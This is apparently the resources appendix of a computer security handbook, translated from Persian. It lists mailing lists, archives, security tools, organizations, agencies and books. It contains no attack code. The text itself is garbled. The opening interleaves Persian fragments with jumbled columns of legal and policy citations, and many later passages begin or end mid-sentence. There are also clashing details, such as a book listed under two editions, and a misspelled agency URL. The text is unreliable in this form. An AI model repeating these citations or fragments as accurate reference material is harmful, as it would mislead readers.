ﻛﻤﻴﺴﻴﻮﻥ ﺣﻔﺎﻇﺖ ﻭ ﻣﺒﺎﺩﻻﺕﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻋﻠﻴـﻪ ﺷـﺮﻛﺘﻬﺎﻳﻲ
ﭘﺎﻳﮕــﺎﻩ ﻭﺏ.(http://csrc.nist.gov/) ﺭﺍ ﻣﻨﺘــﺸﺮ ﻛــﺮﺩﻩ ﺍﺳــﺖ
ﻛﻪ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧﻮﺩ ﺩﺭ ﻣﻘﺎﺑﻞ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻣﺠـﺎﺯ
: ﻧﻴﺰ ﺩﺭ ﺁﺩﺭﺱ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖNIST ﺍﻧﺘﺸﺎﺭﺍﺕ
http://csrc.nist.gov/publications/index.html
ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﻣﺤﻔﺎﻇﺖ ﺑﻌﻤﻞ ﻧﻤـﻲﺁﻭﺭﻧـﺪ ﺍﻗـﺪﺍﻣﺎﺕ ﻗـﺎﻧﻮﻧﻲ
ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺑـﻪ ﻣﻨﺒـﻊ ﺯﻳـﺮ.ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ
National Security Agency, Security :ﻣﺮﺍﺟﻌﻪ ﻧﻤﺎﻳﻴﺪ
Recommendation Guides,
http://nsa1.www.conxion.com/
SEC v. National Business Communications
CERT/Coordination Center, Software Corp., SEC Litig. Release No. 11223, Sept.
Engineering Institute, Carnegie Mellon 19, 1986, SEC Litig. Release No. 11229,
University, http://www.cert.org/ Sept. 26, 1986. In the Matter of Material
Sciences Corporation, SEC Litig. Release
European Commission, Communication No. 41930, Sept. 28, 1999.
from the Commission to the Council, the
European Parliament, the European Sarbanes-Oxley Act of 2002, Pub. Law 107-
Economic And Social Committee and the 204.
Committee of the Regions - Network and
Information Security: Proposal for a http://www.aicps.org; http://www.isaca.org.
European Policy Approach, June6, 2001,
COM(2001) 298 final, ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴـﺖ،ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺭﻭﺷﻦ ﺷـﺪ
http://europa.eu.int/information_society/eeurop ﺩﺭ ﺯﻣﻴﻨـــﺔ ﺍﻣﻨﻴـــﺖOECD ﺍﺯ ﺭﻫﻨﻤﻮﻧﻬـــﺎﻱ- ﺭﺍﻳﺎﻧـــﻪﺍﻱ
e/news_library/new_documents/index_en.htm
the Eighth Session, Apr. 27-May 6, 1999, COM(2003) 63 final, 2003/0032 (COD),
E/CN.15/1999/12, http://europa.eu.int/information_society/eeurop
http://www.un.org/documents/ecosoc/docs/1 e/action_plan/safe/documents/nisa_en.pdf
999/e1999-30.htm.
Proposal for a Regulation of the European
UN, International Review of Criminal Policy - Parliament and of the Council Establishing
United Nations Manual on the Prevention the European Network and Information
and Control of Computer-Related Crime, Security Agency, Commission of the
http://www.uncjin.org/Documents/EighthCon European Communities, Feb. 11, 2003,
gress.html COM(2003) 63 final, 2003/0032 (COD),
http://europa.eu.int/information_society/eeurop
ﮔﺰﺍﺭﺵ ﻛﻤﻴﺴﻴﻮﻥ ﺍﻗﺘﺼﺎﺩﻱ ﻭ ﺍﺟﺘﻤﺎﻋﻲ ﺷﻮﺭﺍﻱ ﺍﻣﻨﻴﺖ ﺳﺎﺯﻣﺎﻥ e/action_plan/safe/documents/nisa_en.pdf
ﻣﻠﻞ ﺩﺭ ﺯﻣﻴﻨﺔ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﻋﺪﺍﻟﺖ ﻣﺠﺮﻣﺎﻧـﻪ ﻛـﻪ Protecting Developing Economies from
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺳﺎﺯﻣﺎﻥ ﻣﻠﻞ ﻭ ﺳﺎﻳﺮ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺩﺭ ﺣﻮﺯﺓ Cyber Attack – Assistance to Build Regional
Cyber-security Preparedness, APEC Media
:ﺟﺮﺍﺋﻢ ﻓﻀﺎﻱ ﻣﺠﺎﺯﻱ ﻭ ﺍﻣﻨﻴﺖ ﻣﺠﺎﺯﻱ ﺭﺍ ﺧﻼﺻﻪ ﻛﺮﺩﻩ ﺍﺳﺖ Release, Mar. 18, 2003,
Effective measures to prevent and control http://www.apecsec.org.sg/whatsnew/press/Press
computer-related crime, E/CN.15/2002/8, Rel_ProtectgFromCyberAttack_180303.html
Report of the Secretary-General, United
Nations, Economic and Social Council, http://www.ncs.gov/NSTAC/attf.html
Commission on Crime Prevention and
Criminal Justice, Eleventh Session, Vienna, Jody R. Westby, ed., International Guide to
Apr. 16-25, 2002, Combating Cybercrime, AmericanBar
http://www.unodc.org/pdf/crime/commissions Association, Section of Science &
/11comm/8e.pdf Technology Law, Privacy & Computer Crime
Committee, by The American Bar
Gramm-Leach Bliley Act, 15 USC, Association’s Privacy & Computer Crime
Subchapter 1, § 6801. Committee 2003,
http://www.abanet.org/abapubs/books/cyber
Appendix B to Part 570—Interagency crime/
Guidelines Establishing Standards for
Safeguarding Customer Information, Part III, UN General Assembly, Resolution 55/63,
http://www.occ.treas.gov/fr/fedregister/66fr8 Combating the criminal misuse of
616.htm information technologies, Dec. 4, 2000,
http://www.nvk2000.ru/apec/documents/Inter
Financial Institutions and Customer Data: national_Agreements/55-63_English.pdf
Complying with the Safeguards Rule,
http://www.ftc.gov/bcp/conline/pubs/buspubs UN General Assembly, Resolution 56/121,
/safeguards.htm Combating the criminal misuse of
information technologies, Jan. 23, 2002,
Standards for Safeguarding Customer http://ods-dds-ny.un.org/doc/UNDOC/
Information, 67 Fed. Reg. 36484-94, May
23, 2000, (codified at 16 C.F.R. Part 314), ETS no. 185:
http://www.ftc.gov/os/2002/05/67fr36585.pdf http://conventions.coe.int/treaty/EN/cadrepri
ncipal.htm
Technology Risk Management Guidelines
for FinancialInstitutions, Monetary Authority Eighth United Nations Congress on the
of Singapore, Draft Nov. 11, 2002, Prevention of Crime and the Treatment of
http://www.mas.gov.sg/display.cfm?id=94D0 Offenders, Havana, Aug. 27- Sept. 7, 1990,
63CD-5EB6-4636-82B5A725F9F6E9F5 report prepared by the Secretariat, UN
publication, Sales No. E.91.IV.2, chap I.
45 CFR §160, 162, 164;
http://www.cms.hhs.gov/hipaa/hipaa2/regula : ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ،ﺑﺮﺍﻱ ﺩﺭﻳﺎﻓﺖ ﻣﺘﻦ ﺍﻳﻦ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ
tions/security/default.asp United Nations Commission on Crime
Prevention and Criminal Justice, Report on
Part Five
http://news.cnet.com/news/0-1005-200-4523277.html
http://www.wired.com/news/technology/0,1282,34496,00.html
Part Six
http://www.microsoft.com/technet/security/bulletin/MS01-017.asp
helps you keep the messages you want for days and weeks (or even longer) by using the archiving mechanism.

Finally, many security mailing lists also offer a subscription option for receiving a daily digest. In that case members usually receive a single message each day that contains a summary of all of that day's messages. Managing these digests is much easier than sorting separate daily messages. Of course, in that case you may learn of weaknesses only after other administrators and system attackers have already known about them for hours.

Vendors and reputable response teams

Many security incident response teams have mailing lists for publishing their advisories and alerts. Many vendors also have mailing lists for publishing updates and giving advice about their products, such as computer vendors, firewall vendors, and security software vendors (including some free software or shareware). You can contact your vendor and, once you have confirmed that such a list exists, join it. For example, to subscribe to the Microsoft security services mailing list, simply go to the address below and register:
http://register.microsoft.com/regsys/pic.asp

Important mailing lists

A few important mailing lists are listed here.

Bugtraq
An unmoderated mailing list (posting to it does not require a moderator's approval) on computer security. It carries detailed discussion of security holes in the Unix operating system: what the holes are, how they can be exploited, and how they can be fixed. The purpose of the list is to define, recognize, and prevent the abuse of security problems and risks, not to attack systems or exploit their vulnerabilities (although that is exactly the aim of most of its members). To subscribe to this mailing list, go to the website http://www.securityfocus.com. Bear in mind that we have also seen and heard of incorrect and inaccurate items posted to this list. People who are ready to find the mistakes in messages posted to these lists usually take particular care not to reveal their real identity. If this concerns you, post to these lists with greater caution.

SecurityFocus also has other mailing lists that cover other aspects of security (such as intrusion detection systems, honeypots, and viruses) or particular kinds of Unix systems (such as Linux or Sun systems). One interesting mailing list is the "incidents" list, which is dedicated to reporting real attacks on and intrusions into systems; it belongs to Symantec.

NTBugtraq
An unmoderated mailing list on computer security for systems based on Windows NT (including the 2000 and XP versions). Topics unrelated to NT are not part of this list's subject matter. This list can be said to resemble the Bugtraq mailing list in some respects. To subscribe, go to its website at:
http://www.ntbugtraq.com

CERT Advisory
New advisories from the CERT Coordination Center (CERT/CC) about security flaws and patches for computer systems are posted to this mailing list. Reading this list is somewhat tedious, because its remedies are usually so detailed that their purpose cannot easily be grasped. Despite this, the list has its own merits. To subscribe, send your subscription request to the e-mail address majordomo@cert.org and include the phrase "subscribe cert-advisory" in the body of your message.
An archive of past advisories is available at:
http://www.cert.org/nav/alerts.html

Computer Underground Digest
A rare collection of postings on privacy, security, law, and the computer underground. Contrary to its name, this list does not contain "underground" material; rather, it contains information about the environment surrounding computing. Unfortunately the list ceased activity in 2000, and it is not yet known whether it will resume. The list existed on Usenet as the newsgroup comp.society.cu-digest, and the newsgroup was the best means of distributing it. The list is archived at several places on the Internet, including:
http://sun.soci.niu.edu/~cudigest

Firewalls
The "firewalls" mailing list, managed and hosted by the Internet Software Consortium, is a forum for people who wish to discuss the design, construction, operation, maintenance, and philosophy of Internet firewall security systems. To subscribe to this mailing list, go to:
http://www.isc.org/services/public/lists/firewalls.html

Traffic on this mailing list is usually very high (typically tens of messages a day, sometimes reaching more than hundreds). To satisfy members who do not want their mailbox filled with this list's messages, there is also an option to receive a digest of each day's messages, and the original messages are archived on the website.

also covers the network. To read the archive or subscribe to this mailing list, go to:
http://honor.icsalabs.com/mailman/listinfo/firewall-wizards

RISKS
Formally, this mailing list is known as the ACM forum on risks to the public in the use of computers and related systems. Posting to the list requires the moderator's approval, and it carries discussion of the risks that computers and computerization pose to society. The list's messages are also published in the newsgroup comp.risks, and subscribing to that newsgroup is a better way to receive them. If you do not use Usenet (and do not want to read the messages on the website http://groups.google.com), you can send your subscription request to the e-mail address risks-request@csl.sri.com with the word "subscribe" in the body.

Topics raised on this mailing list in the past are also available on the Google website (the address above) or on the website http://www.risks.org.

SANS Security Alert Consensus
This mailing list is a weekly digest of announcements and alerts from various mailing lists and vendors. A subscription can be limited to issues concerning one particular operating system. To subscribe, go to the website http://sans.org.

Usenet groups

There are numerous newsgroups on the Internet that can
was mentioned, holds doubly for newsgroups.

microsoft.public.security,
microsoft.public.win2000.security,
microsoft.public.windowsxp.security_admin
began from a gopher system and web servers and from a personal archive (belonging to Spafford), became the COAST laboratory archive, and then turned into the present archive, CERIAS. In its first decade this center was known as the largest archive of security material on the Internet. In recent years this archive and some lists have in a sense diverged, and less material is published on them than before (many commercial websites have resources that they have used, by paying someone to take charge of it, to build a more comprehensive archive). Nevertheless, this archive can put at your disposal a huge collection of useful tools and documents, including some topics not found in other archives, as well as documents produced by CERIAS or its partner institutions. In addition, it contains many links to the websites of other organizations and resources. The center's web addresses are:
http://www.cerias.purdue.edu/infosec/
ftp://ftp.cerias.purdue.edu

FIRST (Forum of Incident Response and Security Teams)
An organization whose secretariat website holds an extensive archive of material, including links to the web pages of other FIRST teams:
http://www.first.org

NIST CSRC
The computer security division of the National Institute of Standards and Technology (NIST) has a reliable, useful, and comprehensive archive of documents and tools:
http://csrc.nist.gov/index.html

Insecure.org
The home site of the nmap port-scanning tool, which contains links

NIH (National Institutes of Health)
The NIH main web page provides an extensive collection of Internet addresses for other resources and archives:
http://www.alw.nih.gov/security/

Software resources

This section introduces some tools and software packages available on the Internet that can be useful for securing websites. Although this software is free, some of it is restricted in various ways by its authors (for example, it may not be used for commercial purposes or placed alongside the programs on other products' CDs) or by the laws and regulations of the US government (for example, if it contains cryptography, there are restrictions on export and on use in certain places). Read carefully the documentation distributed with the software packages. If you are in doubt about correct use and its restrictions, you can contact the authors directly.

Although we have used most of the software in this list, we cannot take responsibility for the correct operation of the copy you obtain, or for whether using it causes a problem on your system. As with any other software, test these tools first and then use them.

Some software distributors have a PGP key for digital signatures. The signature lets you determine whether the copy of the software you received is the same one that its author turned into the software package. However, the signature gives no guarantee about the legitimacy of the software itself.
take the steps to produce a separate digital signature for each software package. We also recommend that users who download software from the Internet check several other sources for signed versions before downloading unsigned software.

Dual-purpose tools

Kerberos
A secure network authentication system based on private-key cryptography. The source code and papers for this system are available from the Massachusetts Institute of Technology (MIT). For this purpose you can write to the following address:
MIT Software Center
W32-300
20 Carlton Street
Cambridge, MA 02139
(617) 253-7686

You can use anonymous FTP to transfer the files over the Internet:
ftp://athena-dist.mit.edu/pub/kerberos

Kerberos is built into the Windows 2000 operating system and later versions.

Nmap
A port scanner that intruders use to break in and administrators use to defend against break-ins. It can perform a variety of scans over TCP, UDP, and ICMP (including stealth scans, which intruders commonly use for their activities) and has a sophisticated capability for identifying operating systems (vendor and operating system version) remotely.

commands, and remote file transfer (made secure through reliance on cryptography). This software was designed in the OpenBSD project, but its portable version runs on most Unix operating systems and many other operating systems. Many free SSH clients have also appeared for Windows, such as PuTTY. Before you connect to the network, disable the telnet service, and if you must connect to the system over the network, install and run OpenSSH (or another SSH server). You can obtain OpenSSH from the following website:
http://www.openssh.org

OpenSSL
A free implementation of the Secure Sockets Layer (versions 2 and 3) and Transport Layer Security (version 1). It provides a library for these protocols that is commonly used by other servers (such as web servers). It also provides a command-line tool for creating certificate requests, certificates, signatures, and random numbers. OpenSSL can be found at the following website:
http://www.openssl.org

Snort
A powerful free packet-monitoring and intrusion detection system. The intrusion detection rule set is updated regularly and enables it to analyze in real time the TCP/IP packets it monitors and to report suspicious traffic. Obtain this software from the following website:
http://www.snort.org
This program is available from the following sites:
ftp://ftp.porcupine.org/pub/security/index.html
ftp://ftp.cerias.purdue.edu/pub/tools/unix/sysutils/chrootuid/

Portmap
The portmap daemon (written by Wietse Venema) is a replacement for Sun's portmapper program. It has access-control and logging capabilities that were not present in Sun's portmapper. Also, by

This program is available from the following sites:
ftp://ftp.porcupine.org/pub/security/index.html
ftp://ftp.cerias.purdue.edu/pub/tools/unix/netutils/portmap/

Portsentry
A defensive program against port scans, which may precede an attack. Portsentry listens on unused TCP/IP ports and takes action when outsiders attempt to connect to one or more of the monitored ports. These actions can include adding the scanning host's name to the path

This program is available from the following sites:
http://www.oit.ucsb.edu/~eta/swatch/
ftp://ftp.cerias.purdue.edu/pub/tools/unix/logutils/swatch/

Tcpwrapper
A system (written by Wietse Venema) that lets you monitor and filter the requests that arrive for servers through inetd. Using this program you can

checks a specified set of files and directories against the corresponding information in a database and reports added files, deleted files, and files whose contents have changed. Run Tripwire on a regular schedule. On each run the program then shows the system administrator what has changed, which allows damage to be discovered quickly and control measures to be started promptly.

The free version of Tripwire is available at the following website:
http://www.tripwire.com/ddownloads
1515 Broadway
17th Floor
New York, New York 10036-5701
+1-212-869-7440
http://www.acm.org

This institute was founded in 1974 as a multi-purpose organization to help its members protect electronic information-processing resources. CSI sponsors security workshops and conferences, publishes a research journal and a specialist computer security newsletter, and serves as an important source of security information. On a mutual-benefit basis, the institute offers many services to its members and groups; one example is the publication of the annual Computer Security Buyer's Guide, which lists sources for software, articles, and security consulting.

Computer Security Institute
600 Harrison Street
San Francisco, CA 94107
+1-415-947-6320
http://www.gocsi.com

EFF (Electronic Frontier Foundation)
Provides legal advocacy on issues related to civil liberties and the Internet. Although its aims go well beyond security issues, it has a notable archive of documents related to security and privacy.

Electronic Frontier Foundation
454 Shotwell Street
San Francisco, CA 94110-1914
+1-415-436-9333
http://www.eff.org/

EPIC (Electronic Privacy Information Center)
A public-interest research center that studies issues related to the privacy of electronic information. The center provides legal advocacy on privacy and civil-liberties issues.

1718 Connecticut Avenue NW, Suite 200
Washington, DC 20009
+1-202-483-1140
info@epic.org
http://www.epic.org

HTCIA (High Technology Crimes Investigation Association)
A professional organization for people engaged in the investigation and prosecution of high-technology crime, including computer crime. The organization has chapters in the United States and many other countries, and information about it can be obtained through its website, by e-mail, or by telephone.

HTCIA, Inc.
1474 Freeman Dr.
Amisville, VA 20106
+1-540-937-5019
http://htcia.org

ISSA (Information Systems Security Association)
An international organization of information security specialists and practitioners that uses educational sessions, publications, and opportunities for face-to-face interaction to raise the knowledge, skill, and expertise of its members. Besides publishing a newsletter, the organization also sponsors conferences and workshops in this field, and it currently has chapters throughout the United States and the world.

ISSA Headquarters
7044 S. 13th Street
Oak Creek, WI 53154
+1-414-768-8000
+1-800-370-ISSA
http://www.issa.org

ISACA (Information Systems Audit and Control Association)
An international organization of specialists and consulting practitioners in the field of information security management and audit that uses educational sessions, publications, professional certification of experts and specialists, and opportunities for face-to-face interaction to raise the knowledge, skill, and expertise of its members. Besides publishing a journal, the association also gives financial support to related research, conferences, and workshops

518 Association for Computing Machinery
519 Special Interest Groups
520 American Society for Industrial Security
(On the above site, go to the pages on security issues or TC 11.)

holds an annual symposium on network security.

SANS (institute for system administration and network security)
An organization that holds workshops and conferences at various locations in the United States to provide continuing education in various aspects of security and system administration. Its courses include training on intrusion detection, firewalls, and general security. The organization also publishes various newsletters, alerts, and self-study guides on its website.

US government organizations

NIST (National Institute of Standards and Technology)
This institute (formerly named the National Bureau of Standards) is responsible for developing computer security standards and evaluation methods for applications outside the Department of Defense. In addition to developing standards, its activities include research.

offer useful tips for changing the default configuration so as to increase the security of the system.

Emergency response organizations

The Department of Justice, the FBI, and the US Secret Service, which are listed below, investigate violations of national laws concerning fraud, theft, and misuse of computer resources. The various incident response teams, including FIRST, do not confine themselves to investigating computer crime; rather, they come to the aid of victims when security incidents occur, and they also carry out research, provide information, and give support in order to reduce the likelihood of such incidents occurring or spreading.

Note that national agencies usually have regional (local) offices from which you can obtain more specific information, although not all local offices are staffed by personnel trained to the same level as the staff of the headquarters offices.

DOJ (Department of Justice)
10th & Constitution Ave. NW
Criminal Division (Computer Crime & Intellectual Property Section)
John C. Keeney Building, Suite 600
Washington, DC 20530
+1-202-514-1026
http://www.cybercirne.gov

FBI (Federal Bureau of Investigation)
In addition to the National Infrastructure Protection Center (NIPC), the FBI has the Infraguard center, a set of regional partnership activities in which the FBI and the local economy, in order to counter crimes

National Infrastructure Protection Center
J. Edgar Hoover Building
935 Pennsylvania Avenue, NW
Washington, D.C. 20535-0001
+1-202-323-3205
http://www.nipc.gov

USSS (US Secret Service)
Financial Crimes Division
Electronic Crime Branch
U.S. Secret Service
Washington, DC 20223
+1-202-435-7700
http://www.ustreas.gov/usss/financial_crimes.shtml

FIRST (Forum of Incident Response and Security Teams)
This forum was founded in March 1993. FIRST is a coalition that brings together various security incident response teams from the public sector, the private sector, and universities. The founders of FIRST came together from numerous incident response teams around the world. The goals of FIRST are:

• to increase cooperation among information technology users in countering, detecting, and recovering from computer security incidents;
• to provide a means of informing and alerting clients about incidents and growing threats;
• to support and expand the activities of member response teams through activities such as research and operational work; and
• to encourage and facilitate the sharing of security-related information, tools, and techniques.

Each year FIRST [holds] a workshop on incident response
became a nonprofit organization, and its secretariat duties were separated from NIST.

FIRST Secretariats
First.Org, Inc.
PMB 349
650 Castro Street, Suite 120
Mountain View, CA 94041
first-sec@first.org
http://www.first.org/

FIRST consists of many organizations. You can use the Internet to view the most recent list of member organizations. If you have a security problem or need help, first see which of these organizations relates to your operations and needs. If you cannot determine this, contact one of them so that they can refer you to the most appropriate group.

Internet hosts, taking effective steps to raise awareness of computer security issues, and conducting research aimed at improving the security of existing systems. The center's web-based archive (http://www.cert.org) contains a rich collection of alerts about past and present security problems.

CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh, PA 15213-3890
+1-412-268-7090
cert@cert.org
We have tried to limit this list to accessible and especially valuable references, so that readers will not have difficulty finding them. Some references are in this list mainly because of their historical value. Where we felt that additional explanation would help the reader, we have provided it.

If you want to build a bookshelf on security, we suggest that before deciding to buy books with attractive titles you visit a specialist bookshop, meet a bookseller at a security conference, or read book reviews in online forums on security issues. This field is advancing and evolving rapidly. Just as you spend your time on flaws and patches,

Wood, Patrick H., and Stephen G. Kochan. UNIX System Security, Carmel, IN: Hayden Books, 1986.

Windows security references

An excellent guide to securing Windows NT-based systems that are used to provide Internet services:

Norberg, Stefan. Securing Windows NT/2000 Servers for the Internet: A Checklist for System Administrators. Cambridge, MA: O’Reilly and Associates, 2002.

Anderson-Redick, Stacey. Windows System Policy Editor. Sebastopol, CA: O’Reilly and Associates, 2000.
ﺑﺨﺶ ﺷﺸﻢ
The story of a major computer crime carried out entirely by two people. This incident led to the creation of the FBI computer crime squad, several FIRST teams, and the Tripwire tool at Purdue University:

Freedman, David H., and Charles C. Mann. @Large; NYC, NY, 1997.

A popular rewrite of an FBI training manual which, although dated, still contains valuable material:

Icove, David, Karl Seger, and William VonStorch, Computer Crime: A Crimefighter’s Handbook, Sebastopol, CA: O’Reilly & Associates, 1995.

A collection of stories about computer crimes and the investigations related to them, which also presents statistics to make the scale of the problem clear:

Power, Richard. Tangled Web. Indianapolis, IN, Que, 2002.

Risks of the computing environment

This book contains a comprehensive survey of the risks of computer systems and examines methods that can be used to produce software that is more fault-tolerant and more robust:

Leveson, Nancy G. Safeware: System Safety and Computers. A Guide to Preventing Accidents and Losses Caused by Technology. Reading, MA: Addison-Wesley, 1995.

The following book is a collection of the most important incidents that have occurred from the creation of electronic mail to the present day. The author of this book (Dr. Neumann) is the editor of the "Internet Risks" mailing list.

The entire ACM journal issue below is devoted to topics concerning the incident caused by an Internet worm:

Communications of the ACM, Volume 32, Number 6, June 1989 (the entire issue).

The following book was in fact the best book discussing the technical aspects of computer viruses, and it was readily available, but it makes no mention of macro viruses:

Ferbrache, David. The Pathology of Computer Viruses. London, England: Springer-Verlag, 1992.

A comprehensive collection of material on viruses, worms, and reprints of classic papers, mentioned here mainly for historical reasons:

Denning, Peter J. Computers Under Attack: Intruders, Worms and Viruses. Reading, MA: ACM Press/Addison-Wesley, 1990.

A comprehensive collection of material on viruses, worms, and the like, mentioned here mainly for historical reasons:

Hoffman, Lance J., Rogue Programs: Viruses, Worms and Trojan Horses. New York, NY: Van Nostrand Reinhold, 1990.

A highly reputable international publication on countering and removing computer viruses, which seems most useful to organizations with a large number of computers. The publication also holds conferences at which notable papers on viruses can be found:

The Virus Bulletin. Virus Bulletin CTD. Oxon, England. (http://www.virusbtn.com)
:ﺍﺳﺖ
Schneier, Bruce. Applied Cryptography: Protocols, Algorithms, and Source Code in C. Second edition. New York, NY: John Wiley & Sons, 1996.

Codes, and Cryptography. (1991):, 46–62.

Lenstra, A.K., H. W. Lenstra, Jr., M.S. Manasse, and J.M. Pollard. “The Number Field Sieve.” Proceedings of the 22nd ACM Symposium on the Theory of Computing. Baltimore MD: ACM Press, 1990, 564–72.
This paper introduced the concept of public key cryptography:

Merkle, Ralph. “Secure Communication over Insecure Channels.” Communications of the ACM 21 (1978): 294–99 (submitted in 1975).

Merkle, Ralph, and Martin E. Hellman. “On the Security of Multiple Encryption.” Communications of the ACM 24 (1981): 465–67.

Merkle, Ralph, and Martin E. Hellman. “Hiding Information and Signatures in Trap Door Knapsacks.” IEEE Transactions on Information Theory 24 (1978): 525–30.

Rivest, Ron, A. Shamir, and L. Adleman. “A Method for Obtaining Digital Signatures and Public Key Cryptosystems.” Communications of the ACM 21 (1978).

Computer security in general

A complete and suitable university-textbook-level introduction to computer security:

Amoroso, Edward. Fundamentals of Computer Security Technology. Englewood Cliffs, NJ: Prentice-Hall, 1994.

A comprehensive book on designing end-to-end systems with security in mind:

Anderson, Ross. Security Engineering; NYC, NY: John Wiley & Sons, 2001.

An excellent book on the history and structure of intrusion detection systems for hosts and networks:

Bace, Rebecca. Intrusion Detection; Indianapolis, IN: Macmillan, 2000.

A journal published 8 times a year by Elsevier in Oxford, England (to order, call +44 (0) 865-512242):

Computers & Security

This journal is one of the most important publications in the field. It is priced more for institutional subscriptions than for individuals. Each issue refers to dozens of other publications and organizations where material of interest may be found, as well as to articles, references, and correspondence. The address of its web pages is also given in the security periodicals section (at the end of this appendix).

A solid introduction to the design of secure systems. Unfortunately, most of the principles set out in this book are still not applied, even in advanced systems:

Gasser, Morrie. Building a Secure Computer System. New York, NY: Van Nostrand Reinhold, 1988.

A good book and research reference that is widely used in academic settings:

Gollmann, Dieter. Computer Security; Chichester, UK, John Wiley & Sons, 1999.

A large and comprehensive collection of papers on all aspects of computer security:

Hunt, A. E., S. Bosworth, and D. B. Hoyt, eds. Computer Security Handbook, 3rd edition. New York, NY: Wiley, 1995.

Another good introduction to computer security:

Pfleeger, Charles P and Shari Lawrence Pfleeger. Security in Computing. Englewood Cliffs, NJ: Prentice-Hall, 3rd edition, 2002.

An excellent introduction to many areas of computer security, and a summary of government security requirements and considerations:

Russell, Deborah, and G. T. Gangemi, Sr. Computer Security Basics. Sebastopol, CA: O’Reilly & Associates, 1991.

Schneier, B. Secrets and Lies: Digital Security in a Networked World. New York: John Wiley & Sons, 2000.
Reading this is essential for anyone seeking to understand the limits of computer security and trust:

Thompson, Ken. “Reflections on Trusting Trust” Communications of the ACM, Volume 27, Number 8, August (1984).

An excellent book on producing secure software and on the problems of undisciplined programming:

Viega, John and Gary McGraw. Building Secure Software; Indianapolis, IN: Pearson/Addison-Wesley, 2002.

A book containing a comprehensive and detailed checklist for assessing the security posture of computers and operations:

Wood, Charles Cresson, et al. Computer Security: A Comprehensive Controls Checklist, New York, NY: John Wiley & Sons, 1987.

Although this book is now out of print, if you can find an old copy it can become a very valuable reference for you.

Network technology and security

The second edition of the classic firewall reference. This book teaches you almost everything about how firewalls work. The original text of the book is widely and freely available at http://www.wilyhacker.com/1e/:

Cheswick, Bill, Steve Bellovin, and Aviel Rubin. Firewalls and Internet Security: Repelling the Wily Hacker, 2nd Edition. Reading, MA: Addison-Wesley, 2003.

An excellent tutorial book that teaches you, in clear detail, how to build your own firewall:

Chapman, D. Brent, and Elizabeth D. Zwicky. Building Internet Firewalls. Sebastopol, CA: O’Reilly & Associates, 2nd edition, 2000.

A complete and engaging reference that explains how TCP/IP networks work, including information on protocols, tuning, and applications:

Comer, Douglas E. Internetworking with TCP/IP, 3rd Edition. Englewood Cliffs, NJ: Prentice Hall, 4th edition, 2000.

Garfinkel, Simson. Web Security, Privacy, and Commerce, 2nd Edition. Cambridge, MA: O’Reilly and Associates, Inc. 2002.

A book that fully describes Kerberos in Windows 2000 and Unix environments:

Garman, Jason. Kerberos – The Definitive Guide. Cambridge, MA: O’Reilly and Associates, Inc, 2003.

A book that gives an excellent overview of TCP/IP networking (with a focus on Unix systems) and is a very useful reference for setting up the core services and tools of Unix networks, such as BIND and sendmail:

Hunt, Craig. TCP/IP Network Administration. Sebastopol, CA: O'Reilly & Associates, 3rd edition, 2002.

Kaufman, Charles, Radia Perlman, and Mike Speciner. Network Security: Private Communications in a Public World. Englewood Cliffs, NJ: Prentice-Hall, 2nd edition, 2002.

A suitable introductory book:

Stallings, William. Cryptography and Network Security: Principles and Practices. Englewood Cliffs, NJ: Prentice-Hall, 2003.

Information on security services and products

A comprehensive list of commercially available computer security hardware and software systems. This list is free with membership in the associated institute (whose web address is http://www.gocsi.com):
Computer Security Buyer’s Guide, Computer Security Institute, San Francisco, CA. (Order from CSI, 415-905-2626)

Understanding the computer security culture

All of the references below describe aspects of the future of computer networks, and they are discussed mostly from the crackers' point of view.

A book containing the various exploits of Australian hackers. Some of the stories in this book are not accurate, because the author was unable to contact all of the victims and assess whether the accounts were true:

Dreyfus, Suelette. Underground; Australia, Reed Books, 1997.

Science-fiction writing that used the word "cyberspace" for the first time:

Gibson, William. Burning Chrome, Neuromancer, Count Zero, Mona Lisa Overdrive, Virtual Light, Idoru, All Tomorrow’s Parties. New York, NY: Bantam Books Cyberpunk.

A book that recounts the stories of three hackers (Kevin Mitnick, Pengo, and Robert T. Morris):

Hafner, Katie and John Markoff, Cyberpunk: Outlaws and Hackers on the Computer Frontier. New York, NY: Simon and Schuster, 1991.

One of the early books describing the commitments and ethical beliefs of hackers:

Littman, Jonathan, The Fugitive Game: Online with Kevin Mitnick. Boston, MA: Little, Brown, 1996.

On Christmas Day 1994, an attacker broke into Shimomura's computer. A few weeks later, Shimomura was asked to help with a series of attacks that had been carried out against several ISP sites in San Francisco. Eventually the attacker's trail led to Northern California, and the continuing investigation led to the pursuit and arrest of Kevin Mitnick. This is the story told in the following book by Shimomura and Markoff (a New York Times journalist who reported on the arrest).

Shimomura, Tsutomu, with John Markoff. Takedown: The Pursuit and Capture of Kevin Mitnick, America’s Most Wanted Computer Outlaw—By the Man Who Did It. New York, NY: Hyperion, 1995.

Sterling, Bruce. The Hacker Crackdown: Law and Disorder on the Electronic Frontier.

The above book is available at many sites on the Internet, including the COAST listings, and also at the following address:
http://www.swiss.ai.mit.edu/~bal/sterling/contents.html

A readable account of tracking a computer intruder across the network. It later emerged that the intruder was working for the KGB and was trying to steal sensitive information from United States systems:

Stoll, Cliff. The Cuckoo’s Egg, Garden City, NY: Doubleday, 1989.
Tor SF Doubles, October, Tor Books, 1990.

